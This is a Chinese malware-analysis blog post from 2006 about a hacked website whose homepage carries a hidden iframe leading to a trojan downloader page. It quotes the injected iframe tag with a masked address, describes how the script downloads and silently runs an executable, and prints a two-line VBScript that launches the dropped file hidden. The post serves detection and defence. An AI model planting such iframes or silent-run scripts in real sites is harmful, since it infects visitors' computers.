endurer 原创
2006-12-18 第1版
网站首页被加入代码:
/----------
<iFrAmE SRc=hxxp://*58.215.*65.2*1/*****/k.htm width=1 height=1 frameborder=0></IfRaMe>
---------/
k.htm Kaspersky报为Trojan-Downloader.JS.Agent.bz,其内容可以分为4段。
第1段:
利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 xxxx.exe,保存为 C:/windows/qing.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
xxxx.exe使用Watcom C/C++ EXE编译,
/-------
文件说明符 : D:/xxxx.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2006-12-18 12:51:52
修改时间 : 2006-12-18 12:54:8
访问时间 : 2006-12-18 12:55:36
大小 : 19968 字节 19.512 KB
MD5 : d66859a23da410c0ca9e8daf387565b9
-------/
Kaspersky 报为:Trojan-Downloader.Win32.Agent.ue,瑞星 报为:Trojan.DL.Agent.yhm。
第2、3段:
是用unescape()和Encode多次加密的VBScript脚本程序,功能是下载yt.vbs,保存为%temp%/yt.vbs,并运行。
yt.vbs的内容为:
/--------------
wscript.sleep 0
wscript.createobject("wscript.shell").run "C:/windows/qing.exe",0
--------------/
功能是运行第1段代码下载的文件C:/windows/qing.exe。
第4段:
打开网页count.html
count.html其实是个CHM文件,释放并运行QQ.EXE。
此QQ.EXE与上面的xxxx.exe完全相同。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
